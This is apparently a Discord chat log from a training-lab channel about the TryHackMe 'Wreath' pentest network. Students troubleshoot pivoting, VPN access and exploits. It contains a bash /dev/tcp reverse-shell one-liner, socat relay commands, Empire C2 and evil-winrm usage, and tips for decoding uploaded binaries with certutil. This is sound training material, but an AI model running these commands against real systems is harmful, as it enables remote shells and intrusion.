you're only it in for x amount of days and gotta rejoin the network afterwards

i dont see a join button anywhere

oh, should be even more top right, haven't joined more than once tho

no idea

fun

over to hololive then, that one works

Leave the room and rejoin.

tried replacing with Muiri's python3 script, still getting the same error :M

finaggling with the script I got it to print the response from trying to add a user to repository, it seems the whole response is just "<Response [500]>"

modified the script to try and get it to print "r" (the variable it uses for all the http responses) in the print of the error message

doesn't really help...

did something happen to the network? Seems to be running with plenty of time, but my shuttle just failed, getting no route to host errors, and destination host unreachable with ping

oh whoops, guess it went down a sec, ip changed lulz

That's normal. You sure it's not executing?

the cannot add user to repository is normal?

Mhm

Or rather, it doesn't usually matter

The command still gets executed

it doesn't show that error in the screenshot at least, let me see what the next step is

oh well, I need to see the whoami, but I can't, the program exits, if I comment out the quit command I get this

oh I closed my window, can't get it until I get sshuttle connected again... but I get more errors and never get the output to the whoami command

I'm guessing with network restart I need a new ssh key since it's a new machine?... but now the CVE python script is failing... so have to shelve the first issue for a moment lulz

you don't need to get a new openvpn file if the network resets do you?

needed new openvpn file, sshuttle worked, found out I misstyped in the name of calling the exploit file lulz

welp, accidentally turned off on me, started the network back up, and now no route to host again, even after getting a new ovpn file, guess I'm done for tonight

I've noticed that the bottom of an instance of the powershell empire client shows unread messages.

Is there a command to read them? I can't find it in the documention on github.

Use starkiler it’s better

I mean they are the same but starkiller has a GUI

"Oh no CLI"

That was very unhelpful.

@manic plover Could you please check this suspicious .exe file archive? 🙂
It doesn't look good

Do you have a screenshot

or can you DM me this person

Sorry, I didn't save any. 😅
I can DM you their name

You were show as online among the Mods so I tagged you 🙂
I remembered A Devil .. and looked for their username by searching - A Devil Of My Word#1823

No worries :)

Thank you

Task 5 - What OS does Nmap think is running?
Can I get some help with this one as I can't figure out what it actually wants

Enumerate the web server!

You'll find your answer there

I enumerated it but where are the headers and how to find out information using them

One way I've done it! Sending a request using Netcat to port 80

You can also enumerate port 80 using -sV

thanks bro I will try it later

hey, somehow I can't download nmap to first mashine. I create python server on my kali VM and curl from ssh sesion. It is interesting that can't ping any address from shh sesion.

VM kali ip I can reach from browser, host win mashine dont have any blocker (AV, firewall)

Reread everything. That's supposed to happen.

Oh, hmm.

Try running a firewall-cmd --list-all

@merry robin Finished Wreath today. Really enjoyed it, great job by all on putting that together.

Hi

I need reset it

There are loads of wreath instances.
If you want a reset on your instance, people need to know what network you're on.

hru guys

Ah i was thinking every people are in the same network, thanks for the answer ;)

Gave +1 Rep to @strange bison

I have been having a little bit of trouble to exploit the git server from my machine do I need to route the exploit through sshuttle or a proxychain in order for it to work?
IIRC the git server is on an internal IP address or can I just the run the exploit directly from my command line?

you adjust the firewall on 200?

I got it working with sshuttle n socat I think

how do you mean? So like create a new firewall rule?

in the section that describes the exploit it notes that the firewall on the 200 box will not allow connections in so you need to add a rule for your prt fwd. Pref above 15000 as well

you will need socat or other fwd to then pass it back to your attack box

Git > webserver > you

webserver maybe your blocking point as its blocking the connection from the gitserver with its firewall.

ahh right o, thanks for the clarification @willow ferry!

Gave +1 Rep to @willow ferry

still a little stuck on creating the firewall rule though

Webserver Exploitation
How can I get a reverse shell (without having the script do it for me)? I've tried nc (which isn't installed) and with bash, but both options did not work.

@random cedar https://www.thegeekdiary.com/5-useful-examples-of-firewall-cmd-command/ I read this, pretty useful.

the command for it is in the notes for he task, just need to substitute the relevant ports you want to use. Then list the firewall rules using the commands from the link above

@surreal sail you should copy nc on the box somehow?

Hm. Let me try this. Thanks for now.

Gave +1 Rep to @willow ferry

you can either catch the shell at the webserver or your attack box (with the relevant prt fwd of course)

I don't see how. The kind of shell I am getting running the script (without continuing with "shell"), does not support anything like wget. So how could I possibly upload anything to it?

so just a basic shell, what about native ways can you use powershell to download it?

from the webserver

why are you trying to do it without the script if you don't mind me asking?

Oh, in the documentation it's mentioned that you could do it manually. I like learning stuff the hard way :)

ah I see, fair enough

well if you command execution on the websever as nt/system, the shortest path is just create the user and logon normally. its more direct but you do miss some interesting learning points

you could modify the orinignal gitstack script to post a base64 encoded version to a file and then use the command to decode into a binary

see certutil.exe for the decoding bit

oh, I am not up to that yet. Just started enumerating and exploiting the first machine. I guess once I progress I am gonna understand what you are talking about ;)

haha! yes, sorry spoilers!

🙈

have fun anyway, I've not fully finished this one either

I tend to poke at bits. Got throwback next

Just started today after that AoC fun. Let's see how long this is gonna take me... Can you interact with others connected to that network?

Or is that not part of the room at all?

although there are others who maybe on the same instance as you, you should concentrate on the rooms, there is prob a set of rules somewhere about it

which also means you should ensure you are following nice n safe opsec for yourself.

i.e. secure your attack box

yeah, read about it not to mess up the system for others. I was just curious if everyone is just targeting the "room" or there is also something going on between the ones connected

it will be shared with other users.

hense you will come across the notes asking to setup your ports above 15000 as to no give other use false positives in ports scans etc

Sounds fun. Is this quite an old room? I see this channel is very quiet...

And sorry for bothering, you mentioned throwback, is that room similar to this one with a walkthrough?

throwback is another network like Wreath, its paid though. Full AD environment

@willow ferry hm. sounds interesting. Thanks for the assistance in the meantime.

Gave +1 Rep to @willow ferry

no worries, happy learning, ask lots of silly questions, best way.

I hope this wasn't too silly :) Have a good one.

you too.

Why isn't NC installed?

Might be installed. But I can not run it from that simple shell.

Tried with perl and python, too. Getting "Failed to execute command" @surreal sail

With the exploit you type in shell it will then prompt for your IP address of your kali machine and the port you want to use.

Then in a new terminal window type nc -lvnp (port number)

I am trying to do it manually (w/o typing "shell" in the exploit), as the option for doing it manually is mentioned in the documentation.

why do you want to do that?

Why not? Learn something new.

:)

@random cedar The script is launching a shell with perl which is installed on MiniServ. I don't know why I am getting an error trying to do the same.

The shell requires a listener on your end in order for it establish the connection

and there is where the nc listener comes in

I am aware of that. Please see the attached screenshot. Can you explain to me what's wrong with my command?

You don't need to do that the CVE exploit already has the payload ready written all you need to do is point and shoot really

this is to connect to the .200 server right?

Correct. I am aware that I can use the "shell" and I've done that and I have the id_rsa key already. I just want to know how to do this manually. If you are just looking for the easiest solution how to finish this room, just ignore me :)

ahh right

I just simply used the exploit and it did it for me, but I haven't tried your version

I do have some issues while executing NMAP. I can scan the whole range, but a specified host does not work

Is this the shell from Muir's Webmin exploit?
Could you not get a stable shell or ssh as mentioned in the room?

yes, it is the shell from the webmin exploit , was allready trying to get a stable shell 😉 Thanks!

Yeah, it seems to be a TimeoutError as that nmap -sS .. is taking longer😅

And i jumped back into this room after several periods of being away, so i needed to check where i left off

Hello everyone, I don't know why I can't remote desktop into the windows server?

I have created a user and added him to the administrators group and the remote management users also however I cannot remote desktop in the server using those credentials

@oblique crag

Were you able to remote dekstop in the windows server?

why did you ping dark?

Which one?
There are two, git-serv and wreath-pc
The room discusses about getting a remote desktop connection for git-serv

I did RDP into both of them🙂

Just wanted help? Is it not allowed?

but why ping dark, there are other people who can help you

I didn't know, I just joined the server few minutes ago

Ohh, I see

np

Nice, I was talking about the git-serv

I don't know why I am not able to paste a photo over here

!docs verify

You are required to verify yourself first to be allowed to post images and join voice channels and other stuff

Yeah done, thank you for that

Gave +1 Rep to @lusty saffron

I think I should be able to rdp:

@lusty saffron

@hollow bane

Sorry, I wasn't notified for that edited message 🤷‍♂️

I do not remember the exact steps for this room
Did you add firewall rule correctly?
And set up remote port forwarding to access git-serv's RDP service

And what are you getting as an error while logging in for a remote desktop session?

I am not sure about the third line

@lusty saffron I just did this:

Try this evil-winrm -u user_hacker -p 'P@$$word1' -i 10.200.196.150
Single quote the password (as it contains $, the shell parses it differently)

Perhaps try a simple password to test it 😄
I guess the creds aren't correct, hence the AuthorizationError

anyone run into this issue when trying to run the empire server?

Traceback (most recent call last):
  File "/usr/share/powershell-empire/empire.py", line 11, in <module>
    import empire.server.server as server
  File "/usr/share/powershell-empire/empire/server/server.py", line 24, in <module>
    import socketio
  File "/usr/lib/python3/dist-packages/socketio/__init__.py", line 3, in <module>
    from .client import Client
  File "/usr/lib/python3/dist-packages/socketio/client.py", line 7, in <module>
    import engineio
  File "/usr/lib/python3/dist-packages/engineio/__init__.py", line 8, in <module>
    from .asyncio_client import AsyncClient
  File "/usr/lib/python3/dist-packages/engineio/asyncio_client.py", line 7, in <module>
    import aiohttp
  File "/usr/lib/python3/dist-packages/aiohttp/__init__.py", line 6, in <module>
    from .client import (
  File "/usr/lib/python3/dist-packages/aiohttp/client.py", line 35, in <module>
    from . import hdrs, http, payload
  File "/usr/lib/python3/dist-packages/aiohttp/http.py", line 7, in <module>
    from .http_parser import (
  File "/usr/lib/python3/dist-packages/aiohttp/http_parser.py", line 15, in <module>
    from .helpers import NO_EXTENSIONS, BaseTimerContext
  File "/usr/lib/python3/dist-packages/aiohttp/helpers.py", line 667, in <module>
    class CeilTimeout(async_timeout.timeout):
TypeError: function() argument 'code' must be code, not str```

with 0 knowledge of what's going on, my first guess is something to do with python 2 vs 3? No idea tho

Thank you very much, I should just use password123 from now on instead of P@$$word which looked much more secure 😂

Gave +1 Rep to @lusty saffron

They both are pretty insecure 😄

@minor dawn kali issue, apt purge powershell-empire and use the instructions from the official repo

manual install, but works nicely

https://github.com/BC-SECURITY/Empire

Oo thanks

Gave +1 Rep to @willow ferry

yer, I hit the same issue, fresh install of Kali too

weird part is it was working fine like last week, haven't tried to use it since then, spin up the VM yesterday and immediately get that issue, I guess an issue with a new update?

possibly, just not really reliable enough to risk a update whilst testing. 😦

I have used the docker version too which is OK.

But the normal install works great

screw apt installing

Anyone have a link to a god url encoded powershell reverse shell? I’m trying to use it for the bonus question on task 20 (git server) but none of the ones I’ve used have worked

i havent started this box yet and am not familiar with perl. Failed to execute command, means it is trying to execute the perl command you gave (so perl is certainly installed)
gotta be a typo somewhere in that. Try doing that command on your kali machine, ensure you can get a shell to yourself with that command

I'll give it another try.

1st thing i do when copy / paste some long command like that and it doesn't work. Try it out on my box, can i get the reverse shell to myself

and from looking at the screenshot, you appear to be either missing a ", or you have an extra "

the 1st quote in the command is after the perl -e ' <---single quote...but the whole command ends with '" (single followed by double quote)

starting the room now :)@surreal sail

Good!!!

Still not...

now you are missing a quote it looks like...so the other command was correct with all its quotes. Try breaking the command into multiple lines (using the ; as a line seperator) or...and this is a guess...perl is sort of like netcat in that some vesions of perl have -e functionality and some don't? or is that dumb because the exploit is using the same command and it works fine?

Huh, is there SELinux on prod-serv?👀

Sorry. Can you explain? 🤷‍♂️

I wasn't asking you in particular
Just replied to your screenshot 😄

There is context=... in the output of id
IIRC, id shows context if SELinux is configured on the system

And I don't remember seeing that when I completed this room 😅

There is, yes. It's not enforcing anything though.

Was it added recently, because I can't remember seeing that in my runs?
Perhaps, to prevent users messing with tasks to some extent 🙂

Nah, it's always been there

I haven't modified anything in that network for ages

@surreal sail think i am at the part you are. Task 6?

Yes!

@surreal sail playing around with this. the perl in your SS is the shellcode from the exploit? my guess is that there is a bad char. perl -v, and perl -h both give output

and this bash reverse shell works from the exploit prompt (not typing shell)

bash -i >& /dev/tcp/10.20.30.40/1234 0>&1

so that perl command has a character in it that needs to be escaped or quoted or unquoted or something

@hollow plume right now, I can't connect to that server. No idea why.

time limit? i am down to 27 minutes

VPN is up. Can't ping it. Exploit doesn't run.

Still have time.

(right VPN file, not the regular)

i dont know perl well enough to keep poking at that aspect of it, but its guaranteed a bad char...hrm gonna try base64 the perl command then do echo bgajgadj32 | base64 from the exploit prompt

looks like it died on me as well, 22 minutes left on it

Weird. S/o extended my instance by another hour and I can't even ping it.

Someone's having fun.

I feel like when I have to deal with my neighbours :)

*sigh*
Problem with letting people root it is that there will always be immature little trolls who think that shutting the server down is an amusing use of time.
Just go for a reset -- if you can figure out who the morons are I'll see about getting them removed 🙂

Ok, captain. Awesome room. Honestly :)

@merry robin I'm in no rush, still wrapping my head around windows AD and windows buffer overflows
Also taking my time so I can take better notes 🙂

so the entry point is unreachable, i don't know if someone shut it down errr whu
do i have to wait and vote 4 more times before i can resume unless others vote as well? or can someone reset it from an admin panel or something?

You may provide your subnet IP, 10.200.x.x
One of site staff can help you here🙂
IIRC, a user can vote for a reset every hour

You just got another vote from me 🙋‍♂️

194.200 is unreachable
nice

i see the vote

Is pinging one of them (like Ben?) accepted practice?

I personally have no idea about it
If you think it is urgent, like you found a site-bug or in some adverse situation; you may ping one of them🙂

They usually respond in short amount of time😄

depends if you think not being able to do anything on the network is adverse

i guess i could go do something else for a while, just come back and vote every hour

@surreal sail if we vote in an hour and an hour after that, it will reset

¯_(ツ)_/¯

alrighty, I set myself an alarm clock... I am sure this lunatic that did this is just laughing 8-}

i hope it gets logged somewhere

i am having oodles of fun with this network though

well, before this

lol

2 more

anyone with a target subnet of 10.200.194.0/24, please vote for reset

the network went to sleep and i woke it up 🤞 hopefully it works

@surreal sail it's alive

┌──(tmh㉿facepalm13)-[~/Documents/thm/wreath]
└─$ ping thomaswreath.thm                                                                               
PING thomaswreath.thm (10.200.194.200) 56(84) bytes of data.
64 bytes from thomaswreath.thm (10.200.194.200): icmp_seq=1 ttl=63 time=149 ms
64 bytes from thomaswreath.thm (10.200.194.200): icmp_seq=2 ttl=63 time=150 ms
64 bytes from thomaswreath.thm (10.200.194.200): icmp_seq=3 ttl=63 time=144 ms
c64 bytes from thomaswreath.thm (10.200.194.200): icmp_seq=4 ttl=63 time=150 ms
64 bytes from thomaswreath.thm (10.200.194.200): icmp_seq=5 ttl=63 time=147 ms
64 bytes from thomaswreath.thm (10.200.194.200): icmp_seq=6 ttl=63 time=145 ms
^C
--- thomaswreath.thm ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5014ms
rtt min/avg/max/mdev = 143.945/147.495/150.221/2.396 ms

no reset votes needed now as far as i can tell

Great! Thanks, mate.

Gave +1 Rep to @twin flame

yeah! no worries

Any ideas as to why I suddenly can’t connect to the first machine in the network? The Thomaswreath url works but I can’t ssh into, ping or scan it and I was working fine an hour ago

Maybe time expired?

Are you on 10.200.194.200?

Initially it did but I’ve since started it again. Now it just says no route to hose for ssh

10.200.197.200

Succeeded once to copy/pasting the SSH key from prod_serv. Once the machine get reset I needed to fetch it again and I am getting invalid format

make sure you got the newline at the end

and if you are copy / paste from tmux...make sure you full panel ( if you have multiple panels open: ctrl+b, z) before copy / paste otherwise you will get a bunch of strangeness

i can give you the key? should be the same probably?

Hm. Let me try again. Do you copy the last line completely or just till the last - ?

i always do to the bottom (including the blank line under)

the white part being what i am selecting to copy

TADA

Did that.

+rep @hollow plume

Gave +1 Rep to @hollow plume

Took me half an hour trying different editors... :-/

ya different editors handle whitespace and linebreaks etc differently

i generally use nano when copy / pasting things like ssh keys

@surreal sail ok to add you as friend?

@hollow plume Of course. :)

🙂

sshuttle -r root@10.200.192.200 10.200.192.0/24 -e "ssh -i root.webserver.priv"

how come I can't ping 10.200.192.150?

[root@prod-serv ~]# ping 10.200.192.150
PING 10.200.192.150 (10.200.192.150) 56(84) bytes of data.
64 bytes from 10.200.192.150: icmp_seq=1 ttl=128 time=1.26 ms

laurence@laupc ~/THM/wreath % ping 10.200.192.150
PING 10.200.192.150 (10.200.192.150) 56(84) bytes of data.
^C
--- 10.200.192.150 ping statistics ---
4 packets transmitted, 0 received, 100% packet loss, time 3027ms

what are the prerequisites for this room (other than linux command line)?

There's a lot to be said for reading the Introduction for rooms 🙂

I finally got it!!

https://tryhackme.com/notselwyn/badges/wreath

I restarted 3 times because I got stuck

in the past 5 months or so

but aye I finally did it

nice!!

10.200.194.200 is shutdown yet again

please stop extending the time on the 10.200.194.0 network, it needs to sleep so that the entry point can boot

🤞 hoping that works again

Hi All, I'm a subscriber, and have no access to Wreath network, I'm in the room... no VPN servers for me... I have access to holo network... Any ideas?

Nevermind. I left room and join again - all works. So... 99% repairs - turn off and turn on again 🙂

Having trouble connecting to wreath today

I did a small bit yesterday from my VM, had no trouble connecting or anything

but today even though the access page shows I'm connected the ip of the first machine is unreachable

and I am connected with the wreath openvpn config file

I'm on 10.200.199.200 btw, voted to reset but it's only 1/4 guess I'll need to try later, maybe if it sleeps it starts up again properly?

Yes, please reset it.. server did not respond for me...

I just cast the "deciding vote" to reset the network with this IP address, so it should be good now

in fact, I'm confirming it is good now

Thank you!

Hey, why doesn't the metasploit's portfwd work?

Took me a couple of days to work through it and take detailed notes, fun little lab though!

Didn't follow the guide in the AV Evasion section, went for a full Powershell + C# solution. Didn't like the proposed uploading of netcat.exe solution 🤷‍♂️

Yeah. 101 ways to do it, I went for the simplest, most beginner version I could think of given the spec was for a complete beginner network 🤷‍♂️

Just finished Wreath. Very well done and educational network!!

Hey no worries, I've done a couple of things not following the guide but that's partially due to personal taste and experience I guess.
But that doesn't mean it isn't a fun lab to work through. There is quite a good amount of content to be found there even though it's only 3 machines.

It should work as well, though port forwarding individual ports instead of putting up a socks proxy is probably a bit too much of a hassle. Also with the network going to sleep sometimes I would suggest to just use sshuttle and a forward socks proxy with chisel, it's the easiest to work with.
You can then also use Burp in this way when you configure it to route through the chisel proxy.

Hello, for task 34, i tried using chisel for pivoting and I followed the walkthrough from dark but when i try running chisel on my machine, i keep getting a connection error. I put a screenshot of my commands as well

Did you open port 19997 on the windows box? If not then the chisel client can't connect to the server

we do that with the netsh advfirewall ... command right?

YEs

i did in the pane on top and got "Ok" as a response

could it be something with my internet at home? my router has been acting up lately

I would expect that your VPN connection would also crap out in that case, no?

true

then that cant be it because all the other shells and connections were going through

You're sure that your chisel server is running on the windows box and is listening on port 19997?

i mean i got the "Ok" response from running the netsh command with port 19997 as the localport

ill try to find how to check open ports and see if 19997 is there

netstat -ano will help

But you need to run the chisel server on the windows box

yea ill check with it soon and i was in the screenshot as well

then client on our box correct?

yes, chisel server in forward proxy mode on the compromised windows box and then run the chisel client on your attack box

ok thank you, ill post when i try again

I was doing the task 6 and wondering if someone has changed the root password, because the hash i get is not being accepted and it's different than in the walkthrough video

yea the port 19997 is not showing up when i check with netstat

Then your chisel server is probably not running or you put it on another port

ive tried adding a different port too and the same issue, it doesnt seem to open up

But you must have a process listing on that port before it shows up with netstat.
Just opening a port on the firewall doesn't show anything with netstat because there is nothing actually listing on the port you opened on the firewall

ok that makes sense, ill try running chisel with the new port now

got it, something was wrong with my chisel

Just started this network but already stuck on task 6. I always get "[-] Failed to execute command" when I run the CVE....py script.

For task 41, I cant seem to get a shell back, the netcat is being uploaded onto the target but i cant seem to execute the powershell command to get the shell back

runs after a network reset...

hey friends, i have a problem with the connection to Wreath, is this a general problem with all of you??? because the ssh stuck every 10 sec

I am stuck and cant continoue the room , last 4 hours for nothing in this room

You may try this out, if you are using openvpn

# set the MTU size to 1200 bytes
sudo ip link set mtu 1200 dev tun0

Check pinned messages in #site-support
This is one of the suggestions to resolve network issues😄

thanks you 😂 @lusty saffron

Gave +1 Rep to @lusty saffron

Finally finished! Awesome stuffed and learned a ton. Hopefully I did a good job cleaning up lol, i think i got everything. Thanks @merry robin !

Gave +1 Rep to @merry robin

Hi all, I can't connect to the network via VirtualBox and OpenVPN, however, I can confirm I'm connected to THM via 10.10.10.10

anyone else having problems?

Just seeing this, will take a look!

I think, the openvpn for wreath doesn't allow connections to 10.10.10.10
Are you using the right configuration file - wreath's openvpn configuration file

I think thats it. Thanks so much!

Gave +1 Rep to @lusty saffron

So I'm stuck at the reverse shell in the webserver exploitation part. I'm running the python script, turning on the listener in a different tab and then... nothing.

Don't want to spoil anything, so what do you need from me to be more specific?

It took a few days to finish the room, but I learned a lot. Thanks for making this!

you could post a screenshot with spoiler tags to show what you were doing

To check, you're running the VPN in Kali right?

Not on the host OS?

is anyone else getting module issues with empire?

task 33 the github link is down

No idea about the module issues, but I've hunted down what the heck they did with the ps1 source code and changed the link to point at it :)

@fair breach

The Wreath Network is down

10.200.125.0/24

Could you please reset it ??

There aren't enough votes for a reset

Turn on the listener first...run the script...the reverse shell should then catch if written correctly.

Why is cherrytree still recommended in this network when according to the creator "it crashes on large file sizes and is impossible to export out of" and you should switch to trillium?

Two reasons:
A) I wrote Wreath before switching to Trilium for my regular notebook, but more importantly:
B) I still use Cherrytree for pentests / projects / CTFs / smaller notebooks in general. Effectively everything that isn't my regular hacking notebook.
In other words, if I were given Wreath as a pentest, I would still be using Cherrytree as advised

It's only really when it gets to 40 or 50 odd megabytes that it starts getting unstable. For me that was about 1200 nodes. You are never gonna hit that with a pentest

oh thanks for clearing that up.

Gave +1 Rep to @merry robin

network is down... again

jesussss, the network was in sleepy mode 😦

Hi. I've been trying to ssh into the machine for quite some time now but i always got (publickey,gssapi-keyex,gssapi-with-mic) error.. I also didnt find anything useful on the internet.. Then i checked previous chats in this room and saw someone that said add 2-3 new lines at the end of the file and tried that and it worked. Can anyone explain why? in my experience ssh usually fails if there are new lines at the end of the rsa file

Well that's a new one. Nice one. You evaded the bot

But not me

-ban @main ermine Steam Scam -- Compromised account -ddays 4

🔨 Banned maharsomi#9391 indefinitely

Jesus Christ we're having fun today aren't we

-ban 330101054668800010 Scam... of some kind. I actually have no idea why you're advertising weight loss pills 🤷‍♂️ -ddays 2

🔨 Banned Флоки*#9819 indefinitely

hello guys

any help whit ssh error Permission denied (publickey,gssapi-keyex,gssapi-with-mic) ?

im going crazy ... tried differnt ssh conf , add empty line at the end of the key , firewall but nothing ,,,, i can access other machines via ssh but not this one

the id_rsa file is empty, any way of restoring it, or must reset the server?

the id_rsa file on the initial server *

a new one has been just generated, thank you

anybody managed to fix the ssh attempt to connection error Permission denied (publickey,gssapi-keyex,gssapi-with-mic)?

I noticed that on the remote host the authorized_keys file permission is set to -rw-r--r-- and online I could read that the permission is supposed to be set to -rw-r--r-- . However, it's not possible to modify that file (access denied)

I really hope...

also, the ssh connection is not allowed not even without the id_rsa file, and just trying with ssh root@x.x.x.x

I receive the same error

Ah so is not solved... yesterday whit the or not it gave me the error

Whit The key *

I can't connect at this time

I wasn't able to connect at all via ssh

I don't know how to solve it

If somehow I can get in let me know...

You* o boy I woke up 5 minutes ago I can't write properly

I think the issue is in the file authorized_keys. its content it's different from the id_rsa.pub and has permission of -rw-r--r--

dunno...seems people using the thm vm can log in ...

and read this

read the mikka message on this chat ,, he solved by adding 2-3 empty line at the end of the rsa

but in my case do not worked

fixed

i'm in

i created a new authorized_keys file called authorized_keys2 then changed the conf sshd_config file to use the authorized_keys2, restart the service and I'm in

uh i see a new authorized_keys2

ahhaha

i try

basically the authorized_key files must contain the id_rsa.pub key

the original file had a different .pub key. Or at least I think that was the reason, it's working now

i love u

❤️

can I ask someone if what the solution I think for the question {TASK13 - Bonus Question (Optional): Try to create an encrypted port forward or relay using the OPENSSL options in socat} Is correct? I can't find the solution online (and I don't know how to cover a line under the 'spoiler' on the chat

||SPOILER TEXT GOES HERE||

HELP TASK 5. When I run this command in web enumeration, it is super long before ending the scan. Morever, the output shows a way more open ports than it is supposed to. Someone know why? nmap 10.200.164.200 -v -p 1-15000 --open -Pn -oA /home/amandine/Desktop/Wreath/initial-scan

ssh: connect to host 10.200.187.200 port 22: No route to host

only at me ? till 20min ago i can log now give me this error ...

Did you check if the network is running and not sleeping?

Network state : running

whit ping the output say host unreachable

is there time left in the machine? the yellow button next to 'start' should have time running, if not, just add more time clicking the yellow button

-undelete -a

Up to 10 last deleted messages (last hour or 12 hours for premium):

2 minutes ago (Thu Jan 13 11:17:47 2022) Earwig#6490 (ID 928511483040649236): || test spoiler text ||

oh it was just a spolier text try 😄

Sounds like people might be being douches and not opening their ports above 15000. Can you share a screenshot?

All good -- just hunting for the ghost ping 😆

can I ask someone if this could be the correct solution to the question {TASK13 - Bonus Question (Optional): Try to create an encrypted port forward or relay using the OPENSSL options in socat}
||./socat OPENSSL:ATTACKING_IP:8001,cert=shell.pem,verify=0 OPENSSL:TARGET_IP:TARGET_PORT,fork,verify=0 & (quiet)|| -- quiet
.||/socat OPENSSL-LISTEN:33060,fork,reuseaddr,cert=shell.pem,verify=0 OPENSSL:172.16.0.10:3306,verify=0 & (easy)|| -- easy

Uh I'm stupid but not that much anyway I logged now and was ok ... dunno what it was

Thank u anyway

hello guys how to solve the id_rsa problem?

root@10.200.188.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

try now

Yup! Look! I do not know why I have some much random open ports. Here is the command I have used: nmap 10.200.164.200 -v -p 1-15000 --open -Pn -oA /home/amandine/Desktop/Wreath/initial-scan

Yeah, that's people being assholes. Just reset the network on them

Ok. I need 8 people supporting this. Three votes out of 8 for the moment. 🙂

Hosts behind the .200 are dead :(
Except the out of scope ips

I am connected to vpn of wreath but I can't ping the first machine this happened to me yesterday too but somehow it got fixed. Any ideas why does this happen? How can I fix this issue?

Sometimes the network is just in sleepy mode dude, check this first 😉

That happens sometimes when people are asses and shut the box down to spoil it for others.
Go for a Reset, and if you find out who did it, let me know and I'll chuck 'em out of the room :)

thank you

same problem right now:(

I just got disconnected too I am really disappointed I am preparing for an exam

reset needed

I might a little help with the task 20 - setup socat relay and run web-shell with burp. I think I have setup the relay, run netcat on the .200 server, get the reverse on my kali machine, but when I run the web-shell with burpsuit, not really sure on where I should catch the shell.

What I have done:

On the .200 server: run socat with tpc-l:23000 attackIP:45454 &
on the .200 server: run netcat 127.0.0.1 23000 -e /bin/bash --------- at same time on my kali machine run netcat -lvnp 45454, this gives me the shell (not sure if this step was actually done right, adn if I am supposed to have shell of the .200 server). Now I run the powershell exploit with burpsuit, but dont understand where I should get the shell, because nothing changes anywhere. Anyone could help?

the webshell is written with the ip of the .200 server and port 23000 (the one I opened on the server and setup the socat relay as listener

Oh, I just figured it out. sorry for the stupid question and spam. It's 2am and I should go to sleep. I was supposed to run just the socat script on the .200 server and the nc on my machine. This way my nc will catch the webshell

r/ this -- @fair breach you working / able to take a look into whether machines are down?

yeah I can look to see if a machine is up/down

I need a subnet but pref a whole machine IP (:

should this setup work? i'm on the Reverse SOCKS Proxy: section of task 14

(i just read the next section and it mentioned to use socks5 proxy oops, but i just tried that too and still fails)

Hi! I was wondering what is written in the script nc-MuirlandOracle. What does that script do exactly?

it's just nc, using the naming convention he suggested in earlier tasks program-username

ok thanks so its just the command nc ?

Gave +1 Rep to @oblique oar

yes just standard netcat :)

i say standard, but it's the version of nc with the -e flag (default on kali, but other OS's it's a slightly different version)

Great! Thank for your help! I also have another question, where can i found a socat binary that I can transfer to the target machine? Can I just take my binary in /bin/socat then make a copy like /bin/socat-amandine, then transfer socat-amandine to my target machine?

not sure if that relies on other files so idk

i use the version included in the static-binaries repo

Okok! This is what I have tried but I have trouble understanding how the static binaries repo works. Have your transfered all the folder? @oblique oar

no, it's in static-binaries/binaries/linux/x86_64

Ohhh alright! Thanks so much for help 🙂

Gave +1 Rep to @oblique oar

no worries

Chisel Task 14: Does someone has already encountered this issue while unziping a file? I have tried with many unzip utilities, but it is always saying that my file is not in the right format. I have also tried redownloading it multiple time.

just unzip no?
and you got it in your tools.zip from the start 😉

Nan it does not work I do not know why... @wet dawn :/ I have tried with unzip too

In the zip tools.zip from task 1 you have it

ohhh yeah I just found out! Thanks! But why the file does not unzip is quite strange tho! I'll use the one provided by the room.

Gave +1 Rep to @wet dawn

no idea, but go ahead haha 🙂

run file on it, what does it return?

are network working now?

can't connect

can someone check network, maybe this is problem on my side?

what network? mine is fine

task 17

also, a nice little shortcut for this:

send it as a GET request, and then right click Change request method:

Someone has nuked the firewall for that

ah rip oka

Now that is fun.

ye it's nice, changes the method, adds the headers, and swaps the get data to post data

Gonna leave it as is because it'll hopefully teach people what the differences actually are, but add a note for that, I think

git-server 10.200.196.150, down??

cant reach it anymore, not even from webserver

Noice ... but actually Instead of burp I'm trying to learn more curl

It make me feel more hackerman

lol have fun with that

i'm not making it harder for myself 😅

I waited for the network to sleep then started it again, seems to be working now

Sometime when timer goes to zero the button to add more have some problems at least in my browser...try to restart the vpn and open a new wreath page ...should be solve it

im a problem whit emipre's hop

the options are set ok , and it say all was uploaded on /tmp/hop/ but on .200 /tmp/ there is acutally nothing

[] Starting listener 'http_hop_'
[] Hop redirector written to /tmp/http_//admin/get.php . Place this file on the redirect server.
[] Hop redirector written to /tmp/http_//news.php . Place this file on the redirect server.
[] Hop redirector written to /tmp/http_//login/process.php . Place this file on the redirect server.

it writes on your machine /tmp/, not on .200
you have to transfer the files to the machine

Lmao

Ty I guess for me it's time to to sleep 😴

After 10 days, the IP adresses changed from 10.200.194.x to 10.200.191.x ( 100,150, 200). I can't do anything, run script for WebMin RCE not working ...

I had to make sure to update my /etc/hosts and anywhere you put the IP in scripts

also if you've made it to the sshuttle part, make sure you use the new network in that command

TASK 18 - Git Server Pivoting: Getting this error when trying to pivot with sshuttle. I have installed sshuttle. I have checked that I have ssh access to 10.200.164.200 and have verified that python is installed on 10.200.164.200 too. Any idea? 😮

Never mind everyone. I just add sudo at the beggining of the command and it works. Letting the error here in case it can help someone else.

task 29, i'm failing to get a callback from the git server, here is my config in empire:

but when i run the powershell payload on the git server, it's not giving me anything back:

I think your encoded payload in Burp should all be in one line

oh ffs

didn't even realise there were line breaks

lemme try

also make sure you've opened up 50000 on the web server's firewall, that got me stuck for a bit

ye i did that, that got me in an earlier task aha

looks like the command is giving an error or something?

nvm encoding it worked

thank you that would have taken me ages to see 😅

Gave +1 Rep to @tacit anchor

what's this doe with empire

try using "shell hostname", I'm not sure if hostname works on its own, I would need to check the help

ohhh didn't realise i had to prefix commands with shell in starkiller too

some commands you don't (like whoami), you can check the help menu in the agent to see what it supports

oops I didn't realize you were using starkiller, I didn't use it so I have no idea how commands differ there.

Thanks! I make changes in /etc/hosts but it still not working in the first steps with machine .200 :/

Gave +1 Rep to @tacit anchor

wreath was so amazing thank you so much muir !! i learnt loads from this network and is definitely my favourite "room" on thm so far. all the content was formatted beautifully, in a logical manner staying clear and concise, and was really useful knowledge <3

Hey jake, May I DM?

sure

After 10 days, the IP adresses changed from 10.200.194.x to 10.200.191.x ( 100,150, 200). I can't do anything, run nmap for first machine ( host down), script for WebMin RCE not working ...

What I should do?

